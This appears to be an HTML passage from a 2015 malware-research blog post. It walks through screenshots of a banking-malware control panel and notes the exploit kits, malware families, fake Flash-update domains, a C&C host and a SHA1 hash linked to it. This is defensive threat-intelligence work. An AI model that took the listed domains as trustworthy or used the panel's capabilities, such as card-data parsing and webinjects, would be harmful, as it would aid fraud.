&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPc_262ZYR73-Mw3TPTRoDQt0XotDSen4ihTsja1G_QtXV4h-XwmkIqyJ4L5a5NdXAocj76sCfYnX7ltOfWJ_lehs3j6yuZek1Gmju6YASw2ryUNFDItDxAiOXsAKnASejLyv2m17jYyw/s1600/2015-11-22_15-00-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPc_262ZYR73-Mw3TPTRoDQt0XotDSen4ihTsja1G_QtXV4h-XwmkIqyJ4L5a5NdXAocj76sCfYnX7ltOfWJ_lehs3j6yuZek1Gmju6YASw2ryUNFDItDxAiOXsAKnASejLyv2m17jYyw/s400/2015-11-22_15-00-51.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
That right, second one is a blackhole exploit kit.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg9Vc5NyFn32qEgexiznCewbU5fllBhexYt6tVwD-uoo_xjTmzWHO_p5Cp9SrlQAcYkj7FCTGvTDchjcN-U0HIbXUmwh4I19qh2mwTy-0TznZZm2RSO9yRvYuVOjiC5z7XCo4xUntWuI0/s1600/2015-11-22_15-03-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg9Vc5NyFn32qEgexiznCewbU5fllBhexYt6tVwD-uoo_xjTmzWHO_p5Cp9SrlQAcYkj7FCTGvTDchjcN-U0HIbXUmwh4I19qh2mwTy-0TznZZm2RSO9yRvYuVOjiC5z7XCo4xUntWuI0/s400/2015-11-22_15-03-23.png&quot; width=&quot;271&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Jérôme Segura of MalwareBytes have wrote about this one here: &lt;a href=&quot;https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/&quot;&gt;https://blog.malwarebytes.org/exploits-2/2015/11/blast-from-the-past-blackhole-exploit-kit-resurfaces-in-live-attacks/&lt;/a&gt;&lt;br /&gt;
First one is RIG exploit kit delivering Chthonic targeting Russia and Ukraine.&lt;br /&gt;
And for update-flashplayer.ml, update-flash-security.ml, they lead to iBanking download.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEh-Jjp1BQpt_DAlO4K2l0A5DSgVmTmpn3RhK3QQi_XiU-K0KOjtiNj-mqEBIa6DOe59K5Ey1h4bnUU5wzPjnjahmMCfhWec1lbFJ4HhNm1TuRDMdkXYFwH_psC10JfUg1iAptXNU7WZw/s1600/2015-11-22_17-16-46.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEh-Jjp1BQpt_DAlO4K2l0A5DSgVmTmpn3RhK3QQi_XiU-K0KOjtiNj-mqEBIa6DOe59K5Ey1h4bnUU5wzPjnjahmMCfhWec1lbFJ4HhNm1TuRDMdkXYFwH_psC10JfUg1iAptXNU7WZw/s400/2015-11-22_17-16-46.png&quot; width=&quot;302&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
SHA1: E536E23409EBF015C500D5799AD8C70787125E95&lt;br /&gt;
&lt;br /&gt;
CNC at templatehtml.ru&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHZEP8JuSl4E8yQoyAks_ucmk4CJg46o9IS2mCcx6gfyvuyymHyk2diBN5bC_Dr4gQdVS9CTNaNYieAMd4hpeqYhhR4CFEYvI5v9nRSdDF04T97ajUCjE5s2xMARnHh1YlEBq7q834Jm0/s1600/2015-11-22_16-53-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;226&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHZEP8JuSl4E8yQoyAks_ucmk4CJg46o9IS2mCcx6gfyvuyymHyk2diBN5bC_Dr4gQdVS9CTNaNYieAMd4hpeqYhhR4CFEYvI5v9nRSdDF04T97ajUCjE5s2xMARnHh1YlEBq7q834Jm0/s400/2015-11-22_16-53-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
To get back on the original subject, here is the File hunter:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw7kWQoopquqFkQ87i9g4TpYv2yYfyu1wsmY5gHDHj67OGg1tn9ZUbtdXjNH44hCWmLoCmCrwYzEoJwKLZSGPa9rabUGreCXA1VoHeKHMZkpXx6qfhrNLrkLsBaBwoHriClNOGugyEIn8/s1600/2015-11-02_17-32-47.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw7kWQoopquqFkQ87i9g4TpYv2yYfyu1wsmY5gHDHj67OGg1tn9ZUbtdXjNH44hCWmLoCmCrwYzEoJwKLZSGPa9rabUGreCXA1VoHeKHMZkpXx6qfhrNLrkLsBaBwoHriClNOGugyEIn8/s400/2015-11-02_17-32-47.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLtWWwNPgSC-Qm8tPF89mQAa4wAjryDfwOhcEsYY1rZLyn6dvaFpQSTvhpikHF_cjTpYe5n6FYG9_tH3zDtcQtfeurNbOg3pduKgggyPwbIxXn_Pb9m2Meli-KPEX3uUfeSVY6io_0aM/s1600/2015-11-03_23-23-47.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLtWWwNPgSC-Qm8tPF89mQAa4wAjryDfwOhcEsYY1rZLyn6dvaFpQSTvhpikHF_cjTpYe5n6FYG9_tH3zDtcQtfeurNbOg3pduKgggyPwbIxXn_Pb9m2Meli-KPEX3uUfeSVY6io_0aM/s400/2015-11-03_23-23-47.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Downloaded:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFjibZnO5I-cwKfAaJO4574NbjRSiFY-OpmUuxScUJY-trs5W9FaDk7wjDznehN8b9WtdL7pdolrOk24KR3iGKGGzDuMa5Ms7j-rlVew0GE8ol0ghyphenhyphenVgpuoQVpDcbbhd8DZG3YxagNFYQ/s1600/2015-11-02_20-12-21.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;302&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFjibZnO5I-cwKfAaJO4574NbjRSiFY-OpmUuxScUJY-trs5W9FaDk7wjDznehN8b9WtdL7pdolrOk24KR3iGKGGzDuMa5Ms7j-rlVew0GE8ol0ghyphenhyphenVgpuoQVpDcbbhd8DZG3YxagNFYQ/s400/2015-11-02_20-12-21.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Trash:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijl93LkEzBVM8usKi72JxKkIIM7zufFzpgZqgP5a0Cjy_2hkiB9qqXFkzOP-eqQbmR_WYHT-kdG4HlqHSNOILPGG-L3EkfD8X1lO7QWZViIEB9xkSrcy1vBD8igMv7pQdDZAHkiaNyGmk/s1600/2015-11-02_20-13-39.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;302&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijl93LkEzBVM8usKi72JxKkIIM7zufFzpgZqgP5a0Cjy_2hkiB9qqXFkzOP-eqQbmR_WYHT-kdG4HlqHSNOILPGG-L3EkfD8X1lO7QWZViIEB9xkSrcy1vBD8igMv7pQdDZAHkiaNyGmk/s400/2015-11-02_20-13-39.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Mailer:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2wl0uTwP3cT8zF6p6wd3AkANxPb88ofPCQDd9CbwV80d8A9LoXJUv1k2ZOec3ACi2WqcFcrHshD9dmgOlMo8nDJXrvvV50d7O-Bu6dI41ySBLX-MaYXNaoaauNVAaRl02DwbXvN0R7cI/s1600/2015-11-02_17-33-32.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2wl0uTwP3cT8zF6p6wd3AkANxPb88ofPCQDd9CbwV80d8A9LoXJUv1k2ZOec3ACi2WqcFcrHshD9dmgOlMo8nDJXrvvV50d7O-Bu6dI41ySBLX-MaYXNaoaauNVAaRl02DwbXvN0R7cI/s400/2015-11-02_17-33-32.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Config:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj10lRolKK6kTLeuX86MGKS5Iz28enmOpa5pEhcwd1IXHTycTTJ2iey5wyilrIKHQMhJYC8lExaOSqLDIFZH3tFMp9h88TR8zafIR8_qSKNIqU3kn3xQNHZpZr6Y5kwM4hrXVLm3f_ONIw/s1600/2015-11-02_20-10-05.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;280&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj10lRolKK6kTLeuX86MGKS5Iz28enmOpa5pEhcwd1IXHTycTTJ2iey5wyilrIKHQMhJYC8lExaOSqLDIFZH3tFMp9h88TR8zafIR8_qSKNIqU3kn3xQNHZpZr6Y5kwM4hrXVLm3f_ONIw/s400/2015-11-02_20-10-05.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Mail:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaJ4f-jgxTEzG4HPYnvs0RfsXyrFaa_yV_c6e5P1xlX2gZ8Y4UqZ-UtZtbdzcVwhqG70PN3N-qVYIT0o2J_NZic7jOgqKitP2vZeXhWoLcoG72UnNpdd1_7P9micuo0Q8nfRPjEVGZ5o/s1600/2015-11-29_16-48-28.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;357&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlaJ4f-jgxTEzG4HPYnvs0RfsXyrFaa_yV_c6e5P1xlX2gZ8Y4UqZ-UtZtbdzcVwhqG70PN3N-qVYIT0o2J_NZic7jOgqKitP2vZeXhWoLcoG72UnNpdd1_7P9micuo0Q8nfRPjEVGZ5o/s400/2015-11-29_16-48-28.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Informations:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCW3BYly98xYPlsMADjxOUkO39Kbrky1P4IXQ_pi63cMyll9-rkhOV_vaEvJkHvzBGLLJPeDfRQR1lFZjvlEHg4aYUIOtHcTVh73hGhi92N7FEThlDLkXydTUQ52L9Rp400oqZPn9fbeg/s1600/2015-11-02_17-34-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCW3BYly98xYPlsMADjxOUkO39Kbrky1P4IXQ_pi63cMyll9-rkhOV_vaEvJkHvzBGLLJPeDfRQR1lFZjvlEHg4aYUIOtHcTVh73hGhi92N7FEThlDLkXydTUQ52L9Rp400oqZPn9fbeg/s400/2015-11-02_17-34-01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Options:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSdgqk2Qs3fbzpEnSlpwxpjzXZk2PlgM9qtIh5Y5kcH3qYU8SfQDVcYlZI9Y7Je-hDXizjr1ZfOcmqpkolCzVfuHL7_DEVbx61qenqyxIoKFrvqPWvxw6W1d0SsTdSQbei5ho-VrrA3zQ/s1600/2015-11-02_17-35-24.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSdgqk2Qs3fbzpEnSlpwxpjzXZk2PlgM9qtIh5Y5kcH3qYU8SfQDVcYlZI9Y7Je-hDXizjr1ZfOcmqpkolCzVfuHL7_DEVbx61qenqyxIoKFrvqPWvxw6W1d0SsTdSQbei5ho-VrrA3zQ/s400/2015-11-02_17-35-24.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Jabber adress:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPEac44T9dJ5YBN1tW9VeSsqCvju2QKKhASehbwh9491dkxTtbGVqJegiTmqS9rcyiG0cWPEco5KdtzbjET2RpyAElBTT8HopEJhIF9u3dbqIBl2WMVjq6E_2zYntKiJw93T-odyon584/s1600/2015-11-03_23-32-58.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPEac44T9dJ5YBN1tW9VeSsqCvju2QKKhASehbwh9491dkxTtbGVqJegiTmqS9rcyiG0cWPEco5KdtzbjET2RpyAElBTT8HopEJhIF9u3dbqIBl2WMVjq6E_2zYntKiJw93T-odyon584/s1600/2015-11-03_23-32-58.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
User:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8DYGqVLjmKpXiyf2OaxJ9d7DC7iD2e2Eta2HCRCJeKRxbgJA1BxxOGjucS1KnoW45sIdNFJCvwAUIMw7NrOSfXJP7IiaJ18zF8da1fweL0UoECdMfat60B1ABDQwe3K_yCP0r7yqjhpU/s1600/2015-11-02_17-36-16.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8DYGqVLjmKpXiyf2OaxJ9d7DC7iD2e2Eta2HCRCJeKRxbgJA1BxxOGjucS1KnoW45sIdNFJCvwAUIMw7NrOSfXJP7IiaJ18zF8da1fweL0UoECdMfat60B1ABDQwe3K_yCP0r7yqjhpU/s400/2015-11-02_17-36-16.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Users:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXUxXmmbCjouYLQgn1o_MqgKPInPAHEZ7JVxGRKy4wcro8mUQxwD8n31S7PqNck4Sw5E_s0hGdgVccvER-mtDxX0khIMu_NzwxUoujFWpmC7sRSSvIAuYhscGMzDQORJLRqBznooSqg/s1600/2015-11-02_17-36-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAzXUxXmmbCjouYLQgn1o_MqgKPInPAHEZ7JVxGRKy4wcro8mUQxwD8n31S7PqNck4Sw5E_s0hGdgVccvER-mtDxX0khIMu_NzwxUoujFWpmC7sRSSvIAuYhscGMzDQORJLRqBznooSqg/s400/2015-11-02_17-36-40.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Different admins with different rights:&lt;br /&gt;
Some users have limited actions, for exemple one guys had only access to malware upload feature, probably to refresh the crypt.&lt;br /&gt;
6 users including the master user is using russian language on the panel, the rest is configured on english language.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH2u22_TJ3i_IG0vcjAsXJnI4RueGWCpd3KLLAG6kiKBn0gX8UZUrZG8KU7DK4eFbEA7OiLHaiiEqtVcIxwm0vf3TQMPVz8TXsBlSTDWySwZO9do3yK630kB8F5pwwnTwhCeJfPT1yaew/s1600/2015-11-02_17-37-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH2u22_TJ3i_IG0vcjAsXJnI4RueGWCpd3KLLAG6kiKBn0gX8UZUrZG8KU7DK4eFbEA7OiLHaiiEqtVcIxwm0vf3TQMPVz8TXsBlSTDWySwZO9do3yK630kB8F5pwwnTwhCeJfPT1yaew/s400/2015-11-02_17-37-43.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Install:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBkla7Lt0pojh7pHDAyM4jKMdk3Zu9zMUwEMqiI66YQVUhEqGS0yr_h_o-nNJdGhteo4XJIddlGY50l5mWUMnk-aGhXvzPmhlQDyBuUR4Goxw2RNX7-LR0s2OqnxniXbRkdGX4ese7Qg/s1600/2015-11-02_17-40-06.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBkla7Lt0pojh7pHDAyM4jKMdk3Zu9zMUwEMqiI66YQVUhEqGS0yr_h_o-nNJdGhteo4XJIddlGY50l5mWUMnk-aGhXvzPmhlQDyBuUR4Goxw2RNX7-LR0s2OqnxniXbRkdGX4ese7Qg/s400/2015-11-02_17-40-06.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLcOUAqAe6_0RbA9AFQ0pO8hgPd7YWt_uOrqjRnRAgSnJwzPSaUaoFmhcn2wgGyAAyWPrGp6KfSpebuYByCgzmmMU_DuA7Nz6k9yBLuX-r1p2MnB80r1RsshQmwurZyp-glTk2hHFvyE/s1600/2015-11-03_23-53-40.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHLcOUAqAe6_0RbA9AFQ0pO8hgPd7YWt_uOrqjRnRAgSnJwzPSaUaoFmhcn2wgGyAAyWPrGp6KfSpebuYByCgzmmMU_DuA7Nz6k9yBLuX-r1p2MnB80r1RsshQmwurZyp-glTk2hHFvyE/s400/2015-11-03_23-53-40.png&quot; width=&quot;380&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAUfgN-pq_1bHgCz_g9AshoLEAPI5jHTDU9G3b62pULmbhewTOS3Hznm3zZwDd_OoTrezu5qRs02VGpPJtHDq_O3xkVD1aNWe8GU1D8aj2YDo4M8kRhysxgLPTnciARyELtR7iqyr56SM/s1600/2015-11-02_17-39-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAUfgN-pq_1bHgCz_g9AshoLEAPI5jHTDU9G3b62pULmbhewTOS3Hznm3zZwDd_OoTrezu5qRs02VGpPJtHDq_O3xkVD1aNWe8GU1D8aj2YDo4M8kRhysxgLPTnciARyELtR7iqyr56SM/s1600/2015-11-02_17-39-11.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Files:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_bxCbf7XxtE9An-V80mBitEsvXq07p-QLqTKPHZFTbOUy3Sc87p2YNqtLsCZRXr4NfeCnEX4f2_pgHg_80viUxP6yTg7rn3SlnYwH9-LFB2ScFCIfzsVdcWHFh7JImBvbqkAa-QAppw/s1600/2015-11-02_17-41-37.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;386&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD_bxCbf7XxtE9An-V80mBitEsvXq07p-QLqTKPHZFTbOUy3Sc87p2YNqtLsCZRXr4NfeCnEX4f2_pgHg_80viUxP6yTg7rn3SlnYwH9-LFB2ScFCIfzsVdcWHFh7JImBvbqkAa-QAppw/s400/2015-11-02_17-41-37.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
CC parser:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWnTBLItS8y5d4MPp5DGJPzKabPHX_LxQdNsTduS-tAqIJaVypcvvl4YZTnC4Wv53wF3r5e_n-DsK5BUEfZogofmdenFX1tfnaG5OrR3Ws85s_tLG2SO-0jBKxxDjH5gAV7cqsuGvVrgU/s1600/2015-11-03_19-10-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;257&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWnTBLItS8y5d4MPp5DGJPzKabPHX_LxQdNsTduS-tAqIJaVypcvvl4YZTnC4Wv53wF3r5e_n-DsK5BUEfZogofmdenFX1tfnaG5OrR3Ws85s_tLG2SO-0jBKxxDjH5gAV7cqsuGvVrgU/s400/2015-11-03_19-10-23.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Webinject server:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1RdlZXuy5i6opuot_R-RXy-TOS3MRffG97BpsMVSaF2OuJw7DP1vTncQj11JBFRXVAOKR4WVoB4JwKYnnIia-HFWFziHnqp_pqg8g_vF9uSJiijudW74EkmjtNju66xR_ezjk1kWR00/s1600/2015-11-02_18-17-18.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;347&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1RdlZXuy5i6opuot_R-RXy-TOS3MRffG97BpsMVSaF2OuJw7DP1vTncQj11JBFRXVAOKR4WVoB4JwKYnnIia-HFWFziHnqp_pqg8g_vF9uSJiijudW74EkmjtNju66xR_ezjk1kWR00/s400/2015-11-02_18-17-18.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Dashboard:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0T3PrRPyxpKuqbFVeVpl2DRVREP36jnc-dObbv2l5fWkbsBj3gX6pSbfWraPlXKJDHcvNFxA7-XrUkNrePgq_FVym6i1nOnsdqvjV-MmJGl91HN8FhXU41DJnEjmlj7kxDEw5dzHYsmE/s1600/2015-11-02_18-06-11.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;268&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0T3PrRPyxpKuqbFVeVpl2DRVREP36jnc-dObbv2l5fWkbsBj3gX6pSbfWraPlXKJDHcvNFxA7-XrUkNrePgq_FVym6i1nOnsdqvjV-MmJGl91HN8FhXU41DJnEjmlj7kxDEw5dzHYsmE/s400/2015-11-02_18-06-11.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
View:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSNM5_BNi5P91VDgBLpva7wJQ8x4QKAw1GIbAagbDYcZ843LcEbCsmlKP0DjcMLQgPqH6NtqiW7wHdHx6XV1lR5N2ky79P3lFG0gFKuA3eENEEXGo0AWU4Z6gQDxetBCgKoOANLl745w/s1600/2015-11-02_18-09-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;370&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrSNM5_BNi5P91VDgBLpva7wJQ8x4QKAw1GIbAagbDYcZ843LcEbCsmlKP0DjcMLQgPqH6NtqiW7wHdHx6XV1lR5N2ky79P3lFG0gFKuA3eENEEXGo0AWU4Z6gQDxetBCgKoOANLl745w/s400/2015-11-02_18-09-23.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Settings:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
